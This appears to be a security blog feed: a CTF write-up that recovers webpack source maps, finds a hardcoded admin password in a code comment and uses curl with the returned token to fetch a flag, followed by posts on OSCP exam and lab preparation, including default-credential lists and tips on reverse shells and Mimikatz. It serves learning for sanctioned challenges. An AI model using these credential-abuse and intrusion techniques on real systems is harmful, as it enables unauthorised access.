Writing index.js...
Writing route.js...
Writing index.js...
Writing css-base.js...
Writing index.js...
Writing history.js...
Writing hoist-non-react-statics.cjs.js...
Writing inherits_browser.js...
Writing browser.js...
Writing index.js...
Writing json3.js...
Writing index.js...
Writing punycode.js...
Writing index.js...
Writing index.js...
Writing browser.js...
Writing checkPropTypes.js...
Writing factoryWithTypeCheckers.js...
Writing index.js...
Writing ReactPropTypesSecret.js...
Writing has.js...
Writing decode.js...
Writing encode.js...
Writing index.js...
Writing index.js...
Writing formatWebpackMessages.js...
Writing launchEditorEndpoint.js...
Writing index.js...
Writing index.js...
Writing webpackHotDevClient.js...
Writing react-dom.development.js...
Writing index.js...
Writing index.js...
Writing react-is.development.js...
Writing index.js...
Writing BrowserRouter.js...
Writing HashRouter.js...
Writing Link.js...
Writing MemoryRouter.js...
Writing NavLink.js...
Writing Prompt.js...
Writing Redirect.js...
Writing Route.js...
Writing Router.js...
Writing StaticRouter.js...
Writing Switch.js...
Writing generatePath.js...
Writing index.js...
Writing matchPath.js...
Writing withRouter.js...
Writing MemoryRouter.js...
Writing Prompt.js...
Writing Redirect.js...
Writing Route.js...
Writing Router.js...
Writing StaticRouter.js...
Writing Switch.js...
Writing generatePath.js...
Writing matchPath.js...
Writing withRouter.js...
Writing react.development.js...
Writing index.js...
Writing index.js...
Writing resolve-pathname.js...
Writing scheduler-tracing.development.js...
Writing scheduler.development.js...
Writing index.js...
Writing tracing.js...
Writing entry.js...
Writing close.js...
Writing emitter.js...
Writing event.js...
Writing eventtarget.js...
Writing trans-message.js...
Writing facade.js...
Writing iframe-bootstrap.js...
Writing info-ajax.js...
Writing info-iframe-receiver.js...
Writing info-iframe.js...
Writing info-receiver.js...
Writing location.js...
Writing main.js...
Writing shims.js...
Writing transport-list.js...
Writing abstract-xhr.js...
Writing eventsource.js...
Writing websocket.js...
Writing eventsource.js...
Writing htmlfile.js...
Writing iframe.js...
Writing jsonp-polling.js...
Writing ajax-based.js...
Writing buffered-sender.js...
Writing iframe-wrap.js...
Writing polling.js...
Writing sender-receiver.js...
Writing eventsource.js...
Writing htmlfile.js...
Writing jsonp.js...
Writing xhr.js...
Writing jsonp.js...
Writing xdr.js...
Writing xhr-cors.js...
Writing xhr-fake.js...
Writing xhr-local.js...
Writing websocket.js...
Writing xdr-polling.js...
Writing xdr-streaming.js...
Writing xhr-polling.js...
Writing xhr-streaming.js...
Writing browser-crypto.js...
Writing browser.js...
Writing escape.js...
Writing event.js...
Writing iframe.js...
Writing log.js...
Writing object.js...
Writing random.js...
Writing transport.js...
Writing url.js...
Writing version.js...
Writing browser.js...
Writing common.js...
Writing addStyles.js...
Writing urls.js...
Writing browser.js...
Writing tiny-invariant.esm.js...
Writing tiny-warning.esm.js...
Writing index.js...
Writing url.js...
Writing util.js...
Writing value-equal.js...
Writing warning.js...
Writing amd-options.js...
Writing global.js...
Writing module.js...
Writing index.css...
Writing App.js...
Writing AuthStore.js...
Writing CreateAccount.js...
Writing Home.js...
Writing Login.js...
Writing UserService.js...
Writing index.css02e3...
Writing index.js...

┌──(kali㉿localhost)-[~/Documents/cddc2022/unwebpack-sourcemap]
└─$

Afterwards I looked through the file directory

┌──(kali㉿localhost)-[~/Documents/cddc2022/unwebpack-sourcemap]
└─$ cd output/

┌──(kali㉿localhost)-[~/Documents/cddc2022/unwebpack-sourcemap/output]
└─$ ls
app  src

┌──(kali㉿localhost)-[~/Documents/cddc2022/unwebpack-sourcemap/output]
└─$ cd src/

┌──(kali㉿localhost)-[~/Documents/cddc2022/unwebpack-sourcemap/output/src]
└─$ ls
index.css02e3

┌──(kali㉿localhost)-[~/Documents/cddc2022/unwebpack-sourcemap/output/src]
└─$ cd ../app/

┌──(kali㉿localhost)-[~/Documents/cddc2022/unwebpack-sourcemap/output/app]
└─$ ls
front-end

┌──(kali㉿localhost)-[~/Documents/cddc2022/unwebpack-sourcemap/output/app]
└─$ cd front-end/

┌──(kali㉿localhost)-[~/Documents/cddc2022/unwebpack-sourcemap/output/app/front-end]
└─$ ls
node_modules  src  webpack

┌──(kali㉿localhost)-[~/Documents/cddc2022/unwebpack-sourcemap/output/app/front-end]
└─$ cd src/

┌──(kali㉿localhost)-[~/Documents/cddc2022/unwebpack-sourcemap/output/app/front-end/src]
└─$ ls
App.js        CreateAccount.js  Login.js        index.css
AuthStore.js  Home.js           UserService.js  index.js

┌──(kali㉿localhost)-[~/Documents/cddc2022/unwebpack-sourcemap/output/app/front-end/src]
└─$

After that I read some files, most notably are the ones regarding the Login System.

The Login.js has a comment {/\* UnCr@ck@b|3-P@$$W()rd \*/}
1. Since they ask for you to login to the administrator account, you can guess that the username is administrator
The 2nd file, UserService.js, shows that there are 3 endpoints
1. 1 to register user
2. /users/login POST to get login token
3. /users/me to get the name?

┌──(kali㉿localhost)-[~/Documents/cddc2022/unwebpack-sourcemap/output/app/front-end/src]
└─$ cat Login.js
import React, {Component} from 'react';
import AuthStore from "./AuthStore";
import UserService from "./UserService";

class Login extends Component {
    constructor(props) {
        super(props);
        this.state = {
            username: '',
            password: '',
            loading: false,
            errorMessage: undefined
        };
    }

    handleLoginResponse = (response) => {
        if (response.data && response.data.token) {
            AuthStore.saveToken(response.data.token);
            this.props.history.push("/")
        } else {
            this.setState({loading: false, errorMessage: 'Error logging in. Try again later.'});
        }
    };

    handleLoginError = (err) => {
        if (err.response && err.response.status === 400)
            this.setState({loading: false, errorMessage: err.response.data.message});
        else
            this.setState({loading: false, errorMessage: 'Error logging in. Try again later.'});
    };

    login = (event) => {
        event.preventDefault();
        this.setState({loading: true});
        UserService.login(this.state.username,
            this.state.password,
            this.handleLoginResponse,
            this.handleLoginError);
    };

    handleChange = (event) => {
        this.setState({
            [event.target.id]: event.target.value
        });
    };

    render() {
        const loadingDiv = this.state.loading &&
            <div className="d-flex align-items-center justify-content-center overlay">
                <div className="spinner-border text-primary" role="status"/>
            </div>;

        const errorMessageDiv = this.state.errorMessage &&
            <div className="text-danger mb-2">{this.state.errorMessage}</div>;

        return (
            <div className="d-flex flex-column h-100 align-items-center justify-content-center">
                {loadingDiv}
                <form className="flex-column w-25">
                    <h1 className="h3 mb-3 font-weight-normal">Login</h1>
                    {errorMessageDiv}
                    <input autoComplete="off" type="username" id="username" className="form-control mb-3"
                           placeholder="Username" value={this.state.username} onChange={this.handleChange}/>
                    <input type="password" id="password" className="form-control mb-3" placeholder="Password"
                           value={this.state.password} onChange={this.handleChange}/>{/* UnCr@ck@b|3-P@$$W()rd */}
                    <button className="btn btn-lg btn-primary btn-block" type="submit" onClick={this.login}>
                        Submit
                    </button>
                </form>
            </div>
        );
    }
}

export default Login;
┌──(kali㉿localhost)-[~/Documents/cddc2022/unwebpack-sourcemap/output/app/front-end/src]
└─$

┌──(kali㉿localhost)-[~/Documents/cddc2022/unwebpack-sourcemap/output/app/front-end/src]
└─$ cat UserService.js
import axios from 'axios'

class UserService {
    static login(username, password, successCallback, errorCallback) {
        axios.post('/users/login', {
            username: username,
            password: password
        }).then(successCallback).catch(errorCallback);
    }

    static createAccount(username, password, successCallback, errorCallback) {
        axios.post('/users', {
            username: username,
            password: password
        }).then(successCallback).catch(errorCallback);
    }

    static loadCurrentUser(successCallback, errorCallback) {
        axios.get('/users/me').then(successCallback).catch(errorCallback);
    }
}

export default UserService;
┌──(kali㉿localhost)-[~/Documents/cddc2022/unwebpack-sourcemap/output/app/front-end/src]
└─$

This file, AuthStore.js, Shows that you have to put the token in the Authorization header of the request to the backend server to work

┌──(kali㉿localhost)-[~/Documents/cddc2022/unwebpack-sourcemap/output/app/front-end/src]
└─$ cat AuthStore.js
import axios from "axios/index";

class AuthStore {
    static TOKEN_NAME = 'token';

    static isLoggedIn() {
        return localStorage.getItem(this.TOKEN_NAME) !== null;
    }

    static saveToken(token) {
        localStorage.setItem(this.TOKEN_NAME, token);
        axios.defaults.headers.common['Authorization'] = `Bearer ${token}`;
    }

    static removeToken() {
        localStorage.removeItem(this.TOKEN_NAME);
    }

    static getToken() {
        return localStorage.getItem(this.TOKEN_NAME)
    }
}

export default AuthStore;
┌──(kali㉿localhost)-[~/Documents/cddc2022/unwebpack-sourcemap/output/app/front-end/src]
└─$

I tried logging in with administrator:UnCr@ck@b|3-P@$$W()rd, which worked. However, the homepage looked empty

I tried accessing the endpoints manually with curl, by logging in, and accessing /user/me, and discovered the flag

┌──(kali㉿localhost)-[~/Documents/cddc2022/unwebpack-sourcemap/output/app/front-end/src]
└─$ curl -H 'Content-Type: application/json' http://54.254.185.105:5959/users/login -d '{ "username":"administrator", "password":"UnCr@ck@b|3-P@$$W()rd"}'
{"token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiJhZG1pbmlzdHJhdG9yIiwiaWF0IjoxNjU1OTUwNTI0LCJleHAiOjE2NTY1NTUzMjR9.kq6yuPlogXOAc87H5xJyX4te8DfNsco1WTcKZOiv2vw"}
┌──(kali㉿localhost)-[~/Documents/cddc2022/unwebpack-sourcemap/output/app/front-end/src]
└─$ curl -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiJhZG1pbmlzdHJhdG9yIiwiaWF0IjoxNjU1OTUwNTI0LCJleHAiOjE2NTY1NTUzMjR9.kq6yuPlogXOAc87H5xJyX4te8DfNsco1WTcKZOiv2vw' http://54.254.185.105:5959/users/me
{"flag":"CDDC22{50urc3_m4p_15_h1dd3n_g3m}"}
┌──(kali㉿localhost)-[~/Documents/cddc2022/unwebpack-sourcemap/output/app/front-end/src]
└─$

CDDC22{50urc3\_m4p\_15\_h1dd3n\_g3m}

My OSCP Experience

Terence Chan Zun Mun — Sat, 26 Mar 2022 18:13:05 +0000

After

1 month Hack The Box
2 months PWK Labs
2 months Proving Grounds Practice
130+ boxes in total, 57+ without hints
7 months of Trying Harder

I have obtained my OSCP! Here's how I did it.

Background

I have been thinking about doing OSCP since the start of 2021, when I read about it online. It was this mysterious "Entry Level" Cyber Security Certificate that could help you get interviews and more. I've read many reviews, online posts and more, and it seemed useful and a goal I would like to reach while I was in National Service (Singapore Army Conscription).

As a warmup, I started doing eJPT in July 2021, and passed it by September. I liked the experience, so I decided to bite the bullet and sign up for the OSCP exam

I have the following background

19 year old JC Graduate, Currently serving in the Army, Incoming Electrical Engineering undergraduate
- Studied Computing for A Levels - Learnt Python and basic TCP/IP Networking
Did various TryHackMe Boxes
Participated in various CTFs
Linux experience (through Raspberry Pi Tinkering)

My aim is to improve my cybersecurity skills in a verifiable manner. As such, besides just getting the cerificate, I also aim to learn as much as possible.

Preparation

Resources Used

In order of resource used

Platform	Paid Length	Hint	Hintless
TryHackMe	Free	Various
Hack The Box	1 month	37	5
PWK Labs	2 months	48	24
Proving Grounds Practice	3 months	17	28
Vulnhub & PG Play	Free	6	3
PortSwigger Exercises	Free	Various

I followed TJNull's list here

Various Important Courses

TryHackMe
PortSwigger SQL injection and Command Injection labs

Other platforms (like TryHackMe) are good for practicing and building a basic idea of what pentesting is. However, I would recommend Hack The Box, due to the difficulty of the machines (and the similarity to the labs, trust me, you'll see machines which are the same), as well as Proving Grounds Practice (machines & methodology are very similar to the exam)

I've already covered what to do during OSCP labs in a few of my previous posts but in short

1st month I did the Lab Report + Machines without hints
- As my goal was to learn, not just to be certified, I did the lab report. I learnt quite a bit from doing the later course exercises.
2nd month I hacked more machines, last 3 weeks started reading forums

Strategy

I read many guides, some interesting ones are below

Unlike many of those guides, I actually didn't watch a lot of hacking videos (reading writeups is more of my thing, once I tried hacking the boxes), or study Network+ and other technical certifications. I focused more on hacking boxes and hands on experience.

Before I actively started preparing for it, I just do the occasional TryHackMe box for fun. I did not spend a lot of time beforehand studying.

Once I set my mind to getting an OSCP, I spent 1 month doing Hack The Box (October) after signing up for the course (and waiting for access to the materials), before moving on to the PWK Labs (November - December). I then registered for my exam in (March), and practiced Proving Grounds Practice in the 3 months to my exam.

In total I spent $1199 (PWK 60 labs before price hike) + $14 (HTB) + $19*3 (PG) = USD 1270 on the course.

Along the way, I used Obsidian to take notes on the machines and useful techniques, and backed up my notes regularly.

I'll probably never feel confident enough to jump into the exam no matter how many boxes I have hacked. So my mindset was that "I learned so much in this process anyway. It’s just an exam. It's worth to retake even if I fail", and dived into the exam

Methodology

This is something that is tricky to build up. There is no easy way or "cheat sheet" out of this besides hacking more boxes.

Some may argue that you should never use hints. Many others have argued that you should use hints after trying your best on a machine, or after a specific amount of time.

My stance is to not use writeups or hints until close to the end of the subscription/ near the exam/ after a very long while. I think this helps to build perseverence. You are really forced to try harder, try everything, and this mental state is good for OSCP or any stressful situation.
That said, on analysing the machines I hacked, machines that I spent more than 10 days (or about 6 hours at the screen) usually required me to use a writeup to solve.

I ended up using autorecon and getting comfortable with it. It may have a lot of command output, but I understand what it is doing most of the time, and I can fall back on manual enumeration if I cannot get sufficient information.

Here are a few technical tips I learnt throughout my experience

Banner information may not be correct. Enumerate the version number of services
FTP anonymous login doesn't mean you cannot login as other users to get different directories. FTP servers can also start at different working directories (/ftp instead of / on login)
Reverse shell ports that work (bypass firewall) are likely to be application services ports
Pivoting is useful even for standalone boxes, you can access hidden network services for privilege escalation

Exam Experience

The VPN connection is also very similar to Proving Grounds,

You notice that in my writeup I talk very little about Active Directory. The main reason for that is during my exam I actually could not do the AD chain. That's right, I passed purely on 3 standalone machines + lab report.

Here are some tips for the exam from me

Breaks
- I took naps, meals, toilet breaks and more.
- Dont be afraid of leaving your screen for 1h or more.
- Use the time to get some good rest and go back recharged
Backup
- Before my exam, I had to reboot my system and change host OS from Arch Linux to Windows due to an issue with screen sharing. Have backup plans in case things don't work
- My Kali VM crashed. It couldn't boot up. Luckily I restored a backup from 3 months ago that worked.
- I take notes while I'm doing the exam to be used in the report. Backup your findings as they are important to be used in your report
Enumerate
- You can still learn new things on the day of the exam!
- Try enumerating the port in different ways. Research the information in different ways, eg. look at the version number, look at the source code and the related frameworks.
Be Confident!
- Don't worry if you take a long time. I took about 8 hours to even get local of my own box. My exam experience is that once I found something interesting, the machine can be comprimised in 3 hours or so.
- Don't be afraid to use Metasploit/Meterpreter. I ended up using Meterpreter once in my exam, which helped speed up my privilege escalation process significantly.

Report Writing

This was scary for me. I did not want my effort during the 24 hours to all go to waste, especially if the results depend on a Lab Report.

Fortunately, Offensive Security included templates on how to write the templates. They also have some useful resources

During the exam, I made sure to take note of all command line steps and outputs. I also took regular screenshots, as well as the proof screenshot (with the contents of the proof, networking, and proof that the proof file was read from its original location)

For my reports, I included all necessary commands and related output. I did this for my lab report too as this helped train me to write my exam report. My exam report ended up as 65 pages, while my lab report ended up as 600 pages or so.

Some tips for writing the report

Although the template report used screenshots for command line output, you can also just copy and paste the command output as text into the report. I did this as it makes it easier for the reader to "copy and paste"
I wrote my reports in Markdown using the format here.
- I researched more about pandoc and decided to convert my Markdown documents to docx first, edit them in LibreOffice (Page Breaks, better Table of Contents), and export them to PDF for submission
- Test your report conversion before the exam. This helped me figure out issues with my report conversion before the exam (issues with special characters in my terminal), and switch to a system that works.
- Another good report format can be found here, this one provides resources
I used an OSCP Exercise Checklist here to keep track of course exercises done. Keep in mind that your course materials may have different numbering, which happened to me.
I included the autorecon nmap scans in my report.

Afterthoughts

24 hours or so after I submitted the report, I got the good news email! As a reward for passing on my first try, I was one of the last few to be able to receive a physical certification!

Even though Offsec switch the labs right in the middle of my lab time (Adding Active Directory), I was able to finish up my lab report (which saved my exam attempt), study more on Active Directory, and pass the exam.

The most important thing I learnt is to have a methodology, and the mental resilience to Try Harder. This means to keep trying, try in different ways.

For now I'll take a break. My next step would probably be Burp Suite Certified, as I have an exam voucher. In the future I may consider other higher level penetration testing certificates.

That's it from me, hope my experience can help anyone with their OSCP journey!

Proving Grounds Quick Tips

Terence Chan Zun Mun — Sat, 26 Mar 2022 11:59:22 +0000

This is just going to be a quick sharing on my thoughts of Proving Grounds Practice. If you do not know what it is, Proving Grounds Practice is a subscription service for access to machines, mainly for practicing your Penetration Testing skills. It is recommended by many for OSCP practice, due to the similarity of their machines to the exam (after all from the same author).

There are a few things I want to touch on

Connection

My setup is a Arch Linux Host running a Kali VM. The VPN connection works quite well on this. When I use a Windows Host instead, the connection is more likely to disconnect.

There were some connection issues, like

Machines only run when you have an active VPN connection. This makes starting
Machine IP is related to your own VPN connection IP (eg. 192.168.53.55 is the host, while the machine is 192.168.55.109). If they don't match in that way, chances are that you have to reset your VPN connection. I had this issue more than once .

Machines

There are walkthroughs for each machine, but these are limited to 1 per day. You are entitled to 3 hints per day. Offsec doesn't recommend publishing writeups (afterwards, it prevents spoilers). However, Offsec won't take down any writeups which are already published. You can already find writeups online, if you don't want to unnecessarily waste points.

The hints are relatively good, if you want to avoid wasting time being stuck on machines.

Most Practice Machines are good and feel like OSCP machines. Generally you should

TJNull's List is a good place to start
I could only do 1 "Try Harder" machine, and read the writeup of MeatHead. That said, after having done the exam, most of the exam difficulty is more like "Get To Work" 20 point machines.
The community difficulty is usually a better guage of difficulty than the Offsec difficulty (though it is subject to change over time).
- OSCP exam machines (the standalone ones) feel more like "Hard", but that's based on my 1 exam experience.

Tips

There are some important skills that you'll pick up in Proving Grounds.

The most important few are these

The firewall of the machines may be configured to prevent reverse shell connections to most ports except the application ports.
- Use application port on your attacking machine for reverse shell
admin:admin, admin:password, guest:guest, backup:backup, <username>:<username>, default credentials, reused credentials
Google exploits, not just searchsploit. Found many exploits this way
If the ftp command doesn't work, try passive mode, or pftp. Same thing for vice versa.

Here are some useful links

That's it from me!

Overall, Proving Grounds is a solid platform which is very useful for OSCP preparation. I highly recommend anyone preparing for OSCP to get at least a 1 month subscription. I personally used it for 2 months It helped me greatly in my exam prep.

How to OSCP Labs Part 2: Lab Time & Standards to Meet

Terence Chan Zun Mun — Thu, 06 Jan 2022 04:21:49 +0000

So this is my second part of my OSCP Lab series, where I provide hopefully important info on OSCP labs.

By now, you should have already gotten your VPN pack, decided on a strategy, and started studying/hacking. What this article will do is to give some of my (unreliable) advise on what to do when you are deep in the labs.

Nothing here should be a spoiler, everything else can be found online (some even on the official website)

But first, lab report related announcements

One important thing that I almost missed from my report is this:

Each machine's proof.txt must be shown in a screenshot that includes the contents of the file, as well as the IP address of the target by using ipconfig or ifconfig

So yeah, this is the end goal. Don't exploit all the machines in the lab, but forget to screenshot the important things when you are writing.

The lab report is submitted with your exam report, and not at the end of the labs. This can be a good thing. You can write your report after the lab time expires, though I wouldn't recommend it in the event of any mishaps (for example, if something like above happens).

The standards of the lab report needed can be found here

Lab Machines

Let's go through

The Penetration Test

These here are actually some general tips that I learnt from many different platforms, such as TryHackme and HackTheBox.

1. Network Scanning

Autorecon makes life easy. But not that easy. There is a lot of output to filter out. I used autorecon to scan the public network, but I ended up redoing some of the enumeration manually.

For the internal networks, SSH pivoting works well enough most of the time. I mostly did manual enumeration with that. I think you could try autorecon with proxychains, though you would probably need some form of configuration.

2. Service Enumeration

I would highly suggest using some of the penetration testing guidebooks online. They give a decent methodology on how to exploit certain services

3. Initial Foothold

There are a few kinds of ways to get an initial foothold

Firstly, you should look at TryHackMe/HackTheBox/ Proving Grounds/ Other CTF Platforms, which have these:

Service Exploits - Google hard, google wide
File Upload Vulnerabilities
Local File Inclusion - Can be for a custom web app/
SQL Injections - Not as common, but do indeed exist.
Weak Credentials - Look at default credentials, rockyou.txt, username and password are the same? etc.

So what more does a lab environment entail?

Dependencies. There are indeed reuse of credentials
Client Side Exploits. They do happen.

If you have not done a penetration test in a lab environment before, it can be hard to adapt. For me, I did not really pwn any machines with dependencies (except the AD ones).

What I will say though, is that don't over think the dependencies too much (unlike me). Most of the boxes are still relatively standalone. For client side attacks, they will be noticeable (eg. the person in charge will come and view the file? wink). Only if you exhausted all your options for exploiting the services (or if there are no services to exploits) will this play a big part.

4. Privilege Escalation

PWK labs to me isn't the best place to practice privilege escalation. What I mean by this is on too many accounts, I enumerate all the methods & files I can think of... Only for it to be a Kernel exploit, which is supposed to be your last resort. On many machines, privilege escalation is not even necessary, not the best idea for an exam which actively tests it.

However, there are some places where privilege escalation techniques are tested that are NOT in the pdf. Like in the previous part, following the required privesc courses should get you by. Basic enum scripts, looking at special files, processes and services, and more.

5. Post Exploitation

For me, I haven't really done too much post exploitation. However, the basics of post exploitation include

Getting Credentials. Mimikatz is your best friend
Looking through files. Program Files

There is also pivoting. Even though it may not be tested much in the exam, Don't get lazy on pivoting! Some boxes behind the internal networks are actually gold, and help you learn a lot.

I also pwned the AD labs (with some help from the forums in getting a foothold). You should definitely revert the boxes before starting them. To me, I felt they were relatively standard (though I'm not experienced enough to say that)

Tools and you

With dated machines comes requiring dated tools.
More than once, I have encountered machines where new tools would just NOT WORK. Only by looking at hints would I figure. This is super annoying, especially when some of the tools are the BEST/ONLY WAY to exploit a machine. Hence I'm going to advice you on what tools you should keep in mind

Metasploit 6 no longer supports older versions of Windows. If you are using it for some machines, DOWNGRADE it to MSF5. Here's a free tool to help you do so easily
Mimikatz has had some issues working on some versions of Windows. Use version 2.1.0 and below.
Kernel Exploits. Learn how to compile kernel exploits for the specific Operating System Version. I won't say that I have mastered it myself, but you won't be able to find binaries online all the time like in here.

Stuck? Try Harder!!!!!!!!

Yeah I'm not that much of a fan of the Try Harder spirit. In an ideal world, you have all the time you need to try harder, and trying harder will indeed result in learning. In reality... OSCP Lab time is expensive, more expensive than VHL, HackTheBox, TryHackMe, Proving Grounds (which I heard is superior for OSCP anyway). I don't think mindlessly trying harder will be a good use of money and time.

That said, instead of just "Trying Harder", this is what I believe in

1. Try everything

In my opinion, this is the biggest takeaway from my lab experience. Have a methodology, stick to it all the way. However, you may not exactly know what everything is. Here is my 3 steps to trying everything

Get ALL the services & the versions that are running on the machine. Google ALL the possible exploits.
- eg. Web Server, Service running on the web server, Python stack, MongoDB Server.
- You can enumerate the versions from nmap scans, folder names, files, etc.
Make a methodology. Even better, a step by step checklist on what to do
- eg. on web servers, have to read all pages of source code? Directory Enumeration? SQL Injection Testing?
- The absolute last thing I want is to try everything, look up the hint, only to find that the remaining thing is something so simple and obvious.

2. Try Again

Don't be like me, just look at a machine for 2h, say you have no idea on what to do and give up. Hacking takes a lot of time.

Stick with it. Take breaks to work on other machines if needed (though don't just hop between machines)
Revise everything you have looked through. When you get back to a machine, chances are you will forget some information which may be useful.
Repeat your enumeration/ exploitation steps. Try
- After you reset your machine
- With a different enumeration script
- and more!

These are just some general guides. I believe that what you should do is not just take Try Harder at face value. Instead, break it down, figure out how to do better, put your own twist on it. Offensive security has a post on what trying harder means to them. I've also heard the phrase "Enumerate Harder", which sounds good to me too.

Hints

However, when you have followed your methodology through, and are stuck on a machine for way too long, maybe you can use hints.

If you want writeups, you probably can dig up some online somewhere.

The forum is the closest you can get to actual writeups. However, it is also NOT free writeups. Even after looking at a comprehensive hint, you may still be stuck, you may still spend hours. Some machines (like 1nsider, adam) would still take time for me to exploit, even if the pathway is obvious.

Others

Revert when starting a machine
For me, since I have to revisit some machines, I made autoexploit scripts, just in case. Most notably, for the double pivoting.

My personal experience

During my 60 days lab time, I pwned 48 machines

24 were pwned without help
4 were spoiled for me due to a google search/ leftover files
5 + 1 were pwned with the help of the Learning Path/ Hints
14 were pwned with the forums help

Others

Got the flag for 2 machines, without a shell (so not a pwn)
1 only has a low priv shell

I tracked my progress down in a Google Sheet as such. I feel that this is good to build confidence in the machines you are pwning and keep track of the techniques you have learnt.

Judging from the standards of the labs (with my personal bias), I would say that pwning 20-30 machines is substantial enough, but of course the more the better. Some of the other machines may be too reliant on dependencies/ client side exploits etc.

End

I have just recently finished my OSCP Labs. Right now (as of writing this article) I plan on doing more practice, and taking the exam in about 3 months time. I'll probably take a break, do more VulnHub/TryHackMe/HackTheBox, start Proving Grounds etc.

Maybe the next part I write will be about the alternatives to PWK Labs for OSCP Preparation.

How to OSCP Labs Part 1: Getting Started

Terence Chan Zun Mun — Mon, 20 Dec 2021 15:04:40 +0000

So recently, I signed up for PWK Lab access from 7 November 2021 to 6 January 2022. However, one thing that I noticed is that resources on how to use the labs are quite badly scattered around. The official resources are hidden in the FAQ, scattered in different articles. There are some good articles by the community with helpful tips but all their suggestions are also scattered. Today what I'm going to try doing is to consolidate what you need to know when you get your lab access.

I originally had some plans of what to do, but then Offsec just like, Here is the new exam! Now AD is tested and stuff! Yay! Totally didn't ruin my plans at all

Everything in this article can be found freely online without needing access to the paid course material.

Who is this article for

I mainly decided to write this as when I gained access to the PWK labs, I was unsure what to do and where to start. Hence, I want to gather all the key details you should know when you receive your connectivity package.

Buying the Course

So the first thing you would need to do when starting on your OSCP journey is to, of course, buy the course. You can do that through the official website here

The things you would receive are

VPN connectivity pack
Control Panel URL - Very important for managing the network
~800 page PDF and Videos

Some things to take note are

You don't just start lab access right when you bought the course, you have to select from a set of dates. For me, the nearest date (which is the one I chose) was about a month away from the time I bought the course
Right after that you need to confirm your identity, and check your VPN connection. They will send you emails which are time sensitive so take note
On the day you start your labs, you receive the course material, which you should immediately download and backup, since the links expire
You should refer to the FAQ here, and especially the PWK onboarding guide and the OSCP exam guide It provides a lot of important information

Strategies

Some strategies for how best to maximise your course time are

Jump straight into the labs and hacking the machines from day 1. 1.This strategy I find is most suited for experienced users who have done several machines on HackTheBox/Vulnhub (preferably TJNulls list). If you have not I highly discourage doing this
Read through the course materials (PDF/Videos), do the course exercises, and then start the labs
1. This would probably be best suited for beginners or people with insufficient experience
2. It is also what is recommended by Offensive Security themselves.
Do the labs and the course exercises together.
1. This is the strategy I took. Whenever I was stuck at a box, I took some time off to do the course exercises and my lab report
2. One good example is here

What strategy you choose depends on your skill level etc. However, I highly encourage at least glancing through the PDF. After all, if you are here to learn, it doesn't hurt to at least see what they offer and fill in some gaps in knowledge.

There are many writeups on OSCP and how to tackle the exam online. Those make for good and entertaining reads, and it would be fine to include them in your strategy. Just don't be stuck on the paradox of choice and the conflict in opinions. One of the writeup I found the best would be John J Hacking's Guide.

Course Materials: PDF and Videos

As many others have stated, the course will give both a 800ish page PDF, as well as many videos.

I mainly just read the PDF and did not touch the videos. However, you should follow whatever style suits you. If videos are a better way for you to learn, you should watch the videos.

The PDF itself is good but there are still areas which are lacking. Here is a list of (hopefully free) resources which can supplement the PDF

Buffer Overflow
1. The PDF's Buffer Overflow content is good enough for guiding you through how to do a basic buffer overflow but ideally you should get more practice.
2. TryHackMe's Buffer Overflow Prep Room is a good resource, another good practice is BrainPan
Privilege Escalation
1. Linux: TryHackMe's Linux PrivEsc Room is relatively decent

Lab Report & Course Exercises

Many people in the past say doing all the course exercises is not worth it for just 5 points. After all, the course exercises mainly involve simple tasks such as showing that you followed along, do some modification which is either shown in the book or is easy enough to Google and follow along. And there are a lot a of exercises. It took me about a month (though I also did lab machines alongside it) to finish the exercises.

But now with the new change in exam, the Lab report is now 10 points and a big deal. There are more chances where the 10 points would be able to pull the exam to a pass. (In the past, it has a minimal impact, only helping if you fail to privesc either your 25 pointer or 5 pointer or something along those lines. Now it helps if you fail to gain a foothold/privesc in any one of the 3 exploitable machines). It's still a ton of work, but it is more worth it.

However, there are also other reasons to do the lab exercises. They help to significantly consolidate concepts and fill in some knowledge gaps.

You could use the extra time on the Lab Report to hack more machines and become better at hacking and passing through your own merit. Whether you want to do that or get a safety net is up to you to decide.

For me, I did the lab exercises and read the PDF because I came here not just to get the certification, but also to learn

Client Machines

To help with your lab exercises, you will
be given 3 machines to assist you, a Windows Client, Windows Server (in an internal network with the Windows client, not accessible using your VPN normally), and a Linux Client.

On first use I had to reset them before they functioned properly.

You can use remote desktop to connect to your clients (and you can ssh into your Linux client). You can even use tools like evil-winrm to get a shell into your windows client. I used rdesktop to transfer files from my kali VM into my Virtual Machine

Some sample commands



rdesktop <ip> -u admin -p lab -r disk:linux=/home/eaydin/windows

ssh root@<ip>

Lab Access

Scenario

There is a guide that you should read through. The main important takeaways are that

This is meant to simulate a real network.
There are dependencies. You would need to enumerate some files. This is NOT just many unrelated CTF boxes.
There are internal networks, and pivoting too.

Where to start

Before you even start hacking anything, you should know that there is a Learning Path for beginners to follow through. There are also hints you can find on their website.

Once you receive your VPN connection, you can just start scanning the given IP range, which is 10.11.1.1/24, and start hacking!

One Last Thing

Notetaking is going to be essential. It is how you organise your thoughts, learn from past failures, and eventually write your report

Some famous apps are

CherryTree - Good App, downside is that markdown doesn't work
Joplin - Markdown note taking app. Has a phone client. I find it does not support hierarchical notes very well. Also the phone client is slow on very long notes (which I often have)
Obsidian - Also Markdown (though slightly tweaked to allow for easier linking between notes). Can create graph like relations between notes. Has a decent phone app.

Personally what I did was to use Obsidian for Notetaking. I constantly backup (did i mention you should do that for everything, even your VM? ) my vault onto GitLab in a private repo (Thanks John Hammond, that saved my notes many times. If you want to know more about my note taking for ystrategy you can read these resources

TLDR

Time delay between buy date and receive course materials date
Read through the onboarding guide
Choose your strategy wisely, with or without lab report & course exercises?
1. Just need to rdesktop/ssh into your client machines. Make sure to reset before first use.
Read materials/Watch Videos, and start hacking 10.11.1.1/24 on your lab network.
1. If need help starting, follow the PWK Learning Path on their official website
And take notes along the way!

Next Part

For now that's a long enough article. In the next part of my series, I will be discussing more about how I used my lab time, the upsides and downsides of using hints for the labs and so on.

Who knows, will I fail and give up? Or will I manage to pass on my first try? Only time will tell how this article will age...